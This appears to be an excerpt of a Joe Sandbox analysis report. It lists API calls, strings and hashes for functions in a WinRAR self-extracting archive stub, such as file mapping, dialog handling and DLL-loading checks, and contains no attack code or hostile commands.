OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00B7F0C5
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 00B7F0D6
UnmapViewOfFile.KERNEL32(00000000), ref: 00B7F127

Part of subcall function 00B7ED2E: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00B7ED44
Part of subcall function 00B7ED2E: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B7ED80

Part of subcall function 00B70752: _wcslen.LIBCMT ref: 00B70776

CloseHandle.KERNEL32(00000000), ref: 00B7F12E
GetModuleFileNameW.KERNEL32(00000000,00BC0CC0,00000800), ref: 00B7F148
SetEnvironmentVariableW.KERNEL32(sfxname,00BC0CC0), ref: 00B7F154
GetLocalTime.KERNEL32(?), ref: 00B7F15F
_swprintf.LIBCMT ref: 00B7F19E
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00B7F1B3
GetModuleHandleW.KERNEL32(00000000), ref: 00B7F1BA
LoadIconW.USER32(00000000,00000064), ref: 00B7F1D1
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001C9D0,00000000), ref: 00B7F222
Sleep.KERNEL32(?), ref: 00B7F250
DeleteObject.GDI32 ref: 00B7F289
DeleteObject.GDI32(?), ref: 00B7F299
CloseHandle.KERNEL32 ref: 00B7F2DC

Strings

STARTDLG, xrefs: 00B7F217
winrarsfxmappingfile.tmp, xrefs: 00B7F0B9
sfxname, xrefs: 00B7F14F
sfxstime, xrefs: 00B7F1AE
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00B7F18F

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 3014515783-3710569615
Opcode ID: 1a474702e9c3b54d5dd13755503590f0b096704f7f6e9c716ba5d45411724cc7
Instruction ID: 8b164aa832feefb153035a545bd3ebd559244895e7c95cfc1dbb0940603dcd21
Opcode Fuzzy Hash: 1a474702e9c3b54d5dd13755503590f0b096704f7f6e9c716ba5d45411724cc7
Instruction Fuzzy Hash: EF61E571504310ABC321BB65EC4AF7B7BECEB4A744F0044AAF559E32A2DF749944CB61

Function 00B6BA94 Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00B6B98B,000000FF,?,?), ref: 00B6BABD

Part of subcall function 00B6CF32: _wcslen.LIBCMT ref: 00B6CF56

FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00B6B98B,000000FF,?,?), ref: 00B6BAEB
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00B6B98B,000000FF,?,?), ref: 00B6BAF7
FindNextFileW.KERNEL32(?,?,?,?,?,?,00B6B98B,000000FF,?,?), ref: 00B6BB21
GetLastError.KERNEL32(?,?,?,?,00B6B98B,000000FF,?,?), ref: 00B6BB2D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: 471582f8987fb1c25e093c555e71963ab6fc2279d57d513f6d12de4449a42030
Instruction ID: 034c66a95b373b679c2a805e1c2603c2a33522a2ccf2cec698593e6217e2d319
Opcode Fuzzy Hash: 471582f8987fb1c25e093c555e71963ab6fc2279d57d513f6d12de4449a42030
Instruction Fuzzy Hash: E1415D72A00519ABCB25DF64CC94EE9B3F8FB48350F1446A6E56DE3200D734AE95CF90

Function 00B692C6 Relevance: 4.7, APIs: 1, Strings: 1, Instructions: 1157COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B692CB

Part of subcall function 00B6D656: _wcsrchr.LIBVCRUNTIME ref: 00B6D660

Part of subcall function 00B6CAA0: _wcslen.LIBCMT ref: 00B6CAA6

Part of subcall function 00B71907: _wcslen.LIBCMT ref: 00B7190D

Part of subcall function 00B6B5D6: _wcslen.LIBCMT ref: 00B6B5E2
Part of subcall function 00B6B5D6: __aulldiv.LIBCMT ref: 00B6B60E
Part of subcall function 00B6B5D6: GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 00B6B615
Part of subcall function 00B6B5D6: _swprintf.LIBCMT ref: 00B6B640
Part of subcall function 00B6B5D6: _wcslen.LIBCMT ref: 00B6B64A
Part of subcall function 00B6B5D6: _swprintf.LIBCMT ref: 00B6B6A0
Part of subcall function 00B6B5D6: _wcslen.LIBCMT ref: 00B6B6AA

Part of subcall function 00B64727: __EH_prolog.LIBCMT ref: 00B6472C

Part of subcall function 00B6A212: __EH_prolog.LIBCMT ref: 00B6A217

Part of subcall function 00B6B8E6: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B6B5B5,?,?,?,00B6B405,?,00000001,00000000,?,?), ref: 00B6B8FA
Part of subcall function 00B6B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B6B5B5,?,?,?,00B6B405,?,00000001,00000000,?,?), ref: 00B6B92B

Strings

__tmp_reference_source_, xrefs: 00B69596

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: _wcslen$H_prolog$AttributesFile_swprintf$CurrentProcess__aulldiv_wcsrchr
String ID: __tmp_reference_source_
API String ID: 70197177-685763994
Opcode ID: 38a276e83f9fad901bfb5b7b4884c84d3821792828f4018bee59f0f794043963
Instruction ID: 07447326fe55fab21a6ebd4174e16f1e18667403ee6faa0e36261b1378f48a95
Opcode Fuzzy Hash: 38a276e83f9fad901bfb5b7b4884c84d3821792828f4018bee59f0f794043963
Instruction Fuzzy Hash: 4AA2F971904245AEDF15DF74C895BE9BBF8FF05300F0841F9E949AB282DB38A949CB61

Function 00B891B0 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00B89186,?,00B9D570,0000000C,00B892DD,?,00000002,00000000), ref: 00B891D1
TerminateProcess.KERNEL32(00000000,?,00B89186,?,00B9D570,0000000C,00B892DD,?,00000002,00000000), ref: 00B891D8
ExitProcess.KERNEL32 ref: 00B891EA

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 2992e3a53eb1fc0b57569895ad8e68d884e986b6a9a61bc21a55a2cbbd414cec
Instruction ID: 37090f4dbfcdaf6966b44b43ffc52d6c9730678ff7ab3b7ff5999d13fdb27b64
Opcode Fuzzy Hash: 2992e3a53eb1fc0b57569895ad8e68d884e986b6a9a61bc21a55a2cbbd414cec
Instruction Fuzzy Hash: D0E0B635004148ABCF117F64DE0DE697FAAEB50752F054055F9099B132CB35DD83DB90

Function 00B7C9D0 Relevance: 104.0, APIs: 50, Strings: 9, Instructions: 734windowfilesleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B7C9D5

Part of subcall function 00B612F6: GetDlgItem.USER32(00000000,00003021), ref: 00B6133A
Part of subcall function 00B612F6: SetWindowTextW.USER32(00000000,00B945F4), ref: 00B61350

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B7CAC1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B7CADF
IsDialogMessageW.USER32(?,?), ref: 00B7CAF2
TranslateMessage.USER32(?), ref: 00B7CB00
DispatchMessageW.USER32(?), ref: 00B7CB0A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00B7CB2D
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00B7CB50
GetDlgItem.USER32(?,00000068), ref: 00B7CB73
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B7CB8E
SendMessageW.USER32(00000000,000000C2,00000000,00B945F4), ref: 00B7CBA1

Part of subcall function 00B7E598: _wcslen.LIBCMT ref: 00B7E5C2

SetFocus.USER32(00000000), ref: 00B7CBA8
_swprintf.LIBCMT ref: 00B7CC07

Part of subcall function 00B64A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B64A33

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00B7CC6A
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00B7CC92
GetTickCount.KERNEL32 ref: 00B7CCB0
_swprintf.LIBCMT ref: 00B7CCC8
GetLastError.KERNEL32(?,00000011), ref: 00B7CCFA
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00B7CD4D
_swprintf.LIBCMT ref: 00B7CD84
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp), ref: 00B7CDD8
GetCommandLineW.KERNEL32 ref: 00B7CDEE
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00BB1482,00000400,00000001,00000001), ref: 00B7CE45
ShellExecuteExW.SHELL32(0000003C), ref: 00B7CE6D
Sleep.KERNEL32(00000064), ref: 00B7CEB5
UnmapViewOfFile.KERNEL32(?,?,0000421C,00BB1482,00000400), ref: 00B7CEDE
CloseHandle.KERNEL32(00000000), ref: 00B7CEE7
_swprintf.LIBCMT ref: 00B7CF1A
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B7CF79
SetDlgItemTextW.USER32(?,00000065,00B945F4), ref: 00B7CF90
GetDlgItem.USER32(?,00000065), ref: 00B7CF99
GetWindowLongW.USER32(00000000,000000F0), ref: 00B7CFA8
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B7CFB7
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B7D064
_wcslen.LIBCMT ref: 00B7D0BA
_swprintf.LIBCMT ref: 00B7D0E4
SendMessageW.USER32(?,00000080,00000001,?), ref: 00B7D12E
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00B7D148
GetDlgItem.USER32(?,00000068), ref: 00B7D151
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00B7D167
GetDlgItem.USER32(?,00000066), ref: 00B7D181
SetWindowTextW.USER32(00000000,00BB389A), ref: 00B7D1A3
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00B7D203
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B7D216
KiUserCallbackDispatcher.NTDLL(?), ref: 00B7D277
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001C7B0,00000000,?), ref: 00B7D2B9
KiUserCallbackDispatcher.NTDLL(00000000,00000000), ref: 00B7D393
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00B7D3D5
PostMessageW.USER32(?,00000111,00000001,00000000), ref: 00B7D3DD

Part of subcall function 00B7D884: __EH_prolog.LIBCMT ref: 00B7D889

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B7D3F9

Strings

@, xrefs: 00B7CD99
%s, xrefs: 00B7D0D4
STARTDLG, xrefs: 00B7C9F1
winrarsfxmappingfile.tmp, xrefs: 00B7CDAE
LICENSEDLG, xrefs: 00B7D2AE
"%s"%s, xrefs: 00B7CF09
__tmp_rar_sfx_access_check_%u, xrefs: 00B7CCB7
<, xrefs: 00B7CD8C
-el -s2 "-d%s" "-sp%s", xrefs: 00B7CD73

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: Item$Message$Text$Send$_swprintf$FileWindow$CallbackDispatcherErrorLastUser$DialogH_prologLongView_wcslen$CloseCommandCountCreateDispatchExecuteFocusHandleLineMappingModuleNameParamPostShellSleepTickTranslateUnmap__vswprintf_c_l
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 3467143283-1645151803
Opcode ID: e7842b421c6f5ce388dc8b2667ef808b18ac10584ece90dbfa8b86d4c2c2f468
Instruction ID: edccf3e5723f6620cabb4061884a1b0f424123709c49bd416252f9661fc35ec5
Opcode Fuzzy Hash: e7842b421c6f5ce388dc8b2667ef808b18ac10584ece90dbfa8b86d4c2c2f468
Instruction Fuzzy Hash: E442E371944204BAEB21AB649C4AFBE3BFCEB05740F0481D9F558B71E2CFB45A45CB62

Function 00B71B83 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 00B71B9C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B71BAE
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B71BDF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B71E89
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B71EA3
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B71EB3
ReadFile.KERNEL32(00000000,?,00007FFE,00B94D24,00000000), ref: 00B71ED1
CloseHandle.KERNEL32(00000000), ref: 00B71F29
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B71F3E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00B94D24,?,00000000,?,00000800), ref: 00B71F92
GetFileAttributesW.KERNELBASE(?,?,00B94D24,00000800,?,00000000,?,00000800), ref: 00B71FBC
GetFileAttributesW.KERNEL32(?,?,00B94DEC,00000800), ref: 00B71FF8

Part of subcall function 00B71B3B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B71B56
Part of subcall function 00B71B3B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B7063A,Crypt32.dll,00000000,00B706B4,00000200,?,00B70697,00000000,00000000,?), ref: 00B71B78

_swprintf.LIBCMT ref: 00B7206A
_swprintf.LIBCMT ref: 00B720B6

Part of subcall function 00B64A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B64A33

AllocConsole.KERNEL32 ref: 00B720BE
GetCurrentProcessId.KERNEL32 ref: 00B720C8
AttachConsole.KERNEL32(00000000), ref: 00B720CF
_wcslen.LIBCMT ref: 00B720E4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00B720F5
WriteConsoleW.KERNEL32(00000000), ref: 00B720FC
Sleep.KERNEL32(00002710), ref: 00B72107
FreeConsole.KERNEL32 ref: 00B7210D
ExitProcess.KERNEL32 ref: 00B72115

Strings

DXGIDebug.dll, xrefs: 00B71C1C, 00B71F7E
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00B720A4
kernel32, xrefs: 00B71B93
SetDllDirectoryW, xrefs: 00B71BA8
SetDefaultDllDirectories, xrefs: 00B71BD9
uxtheme.dll, xrefs: 00B72037
dwmapi.dll, xrefs: 00B71C47, 00B7202D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1207345701-3298887752
Opcode ID: f5695653f75a4466720bd2cc1a7ac25966e7625d569ff5d4cc7f748ab541d5a7
Instruction ID: c3e70da284118ff6f489ca4dd1a8a3f773f5dfd4fda7591561bd0ad6e0cb2b5c
Opcode Fuzzy Hash: f5695653f75a4466720bd2cc1a7ac25966e7625d569ff5d4cc7f748ab541d5a7
Instruction Fuzzy Hash: D5D182B20487849BDB319F54D949F9F7AE8FF85304F5049ADF2999B150CBB08909CB62

Function 00B7D884 Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00B7D889

Part of subcall function 00B7C504: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00B7C5EB

_wcslen.LIBCMT ref: 00B7DB4F
_wcslen.LIBCMT ref: 00B7DB58
SetWindowTextW.USER32(?,?), ref: 00B7DBB6
_wcslen.LIBCMT ref: 00B7DBF8
_wcsrchr.LIBVCRUNTIME ref: 00B7DD40
GetDlgItem.USER32(?,00000066), ref: 00B7DD7B
SetWindowTextW.USER32(00000000,?), ref: 00B7DD8B
SendMessageW.USER32(00000000,00000143,00000000,00BB389A), ref: 00B7DD99
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B7DDC4

Strings

<br>, xrefs: 00B7DB19
Software\Microsoft\Windows\CurrentVersion, xrefs: 00B7DC5F
ProgramFilesDir, xrefs: 00B7DC8A
%s.%d.tmp, xrefs: 00B7DA85

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 2804936435-312220925
Opcode ID: dae985b2eddce237b0ff33bc0b91d0a17dabe3d9aa764cb697d9febaf120ab2b
Instruction ID: f488b519b8c1a1d7cca44dbb8a0eaab830fe05cb0ffd25d0d6792f054516f8ab
Opcode Fuzzy Hash: dae985b2eddce237b0ff33bc0b91d0a17dabe3d9aa764cb697d9febaf120ab2b
Instruction Fuzzy Hash: 12E14CB2900119AADB24EBA4DC85EEE77FCEF04350F4484E6F659E3050EF749A84CB60

Function 00B6ED87 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B6ED90
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B6EDCC

Part of subcall function 00B6D6A7: _wcslen.LIBCMT ref: 00B6D6AF

Part of subcall function 00B71907: _wcslen.LIBCMT ref: 00B7190D

Part of subcall function 00B72ED2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00B6CF18,00000000,?,?), ref: 00B72EEE

_wcslen.LIBCMT ref: 00B6F109
__fprintf_l.LIBCMT ref: 00B6F23C

Strings

R, xrefs: 00B6EF2C
*messages***, xrefs: 00B6EEE1
$%s:, xrefs: 00B6F21F
RTL, xrefs: 00B6F1FE
*messages***, xrefs: 00B6EF1A
@%s:, xrefs: 00B6F226, 00B6F232
a, xrefs: 00B6EF36
,, xrefs: 00B6F277
, xrefs: 00B6F08C

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 566448164-801612888
Opcode ID: 87e0ea4192dbc61891506f6f52dac7788f101d2150f2b48fb13ab349b029c848
Instruction ID: 20f6fd691b13f935ab3c21625974c148aff0a2f85dd8b6731c5312a8c8cab0b9
Opcode Fuzzy Hash: 87e0ea4192dbc61891506f6f52dac7788f101d2150f2b48fb13ab349b029c848
Instruction Fuzzy Hash: 8132F07290021AEBCF24EF68D841AFA37E5FF14704F4041AAFA1697291EB79DD81CB54

Function 00B7E619 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B7C758: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B7C769
Part of subcall function 00B7C758: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B7C77A
Part of subcall function 00B7C758: IsDialogMessageW.USER32(000104C2,?), ref: 00B7C78E
Part of subcall function 00B7C758: TranslateMessage.USER32(?), ref: 00B7C79C
Part of subcall function 00B7C758: DispatchMessageW.USER32(?), ref: 00B7C7A6

GetDlgItem.USER32(00000068,00BC1CF0), ref: 00B7E62D
ShowWindow.USER32(00000000,00000005,?,?,00000001,?,?,00B7C9A9,00B960F0,00BC1CF0,00BC1CF0,00001000,00BA30C4,00000000,?), ref: 00B7E655
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B7E660
SendMessageW.USER32(00000000,000000C2,00000000,00B945F4), ref: 00B7E66E
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B7E684
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00B7E69E
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B7E6E2
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00B7E6F0
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B7E6FF
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B7E726
SendMessageW.USER32(00000000,000000C2,00000000,00B9549C), ref: 00B7E735

Strings

\, xrefs: 00B7E68E

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 89ac95b511845428d3bc8781526b25b05f6f5947bcbcd71dceb2340295e7eda8
Instruction ID: 4d374252bacd329e72db1ba8eea6ffebed37ab3c26d5e39c995535bfc794a3f2
Opcode Fuzzy Hash: 89ac95b511845428d3bc8781526b25b05f6f5947bcbcd71dceb2340295e7eda8
Instruction Fuzzy Hash: 0431E171145B40AFD321DF209C4EFAB3FACEB4A704F040958F6A1A72A0CB646A0487A6

Function 00B7B6D2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00B7C92D,00000066), ref: 00B7B6E5
SizeofResource.KERNEL32(00000000,?,?,?,00B7C92D,00000066), ref: 00B7B6FC
LoadResource.KERNEL32(00000000,?,?,?,00B7C92D,00000066), ref: 00B7B713
LockResource.KERNEL32(00000000,?,?,?,00B7C92D,00000066), ref: 00B7B722
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00B7C92D,00000066), ref: 00B7B73D
GlobalLock.KERNEL32(00000000,?,?,?,?,?,00B7C92D,00000066), ref: 00B7B74E
GlobalUnlock.KERNEL32(00000000), ref: 00B7B7D6

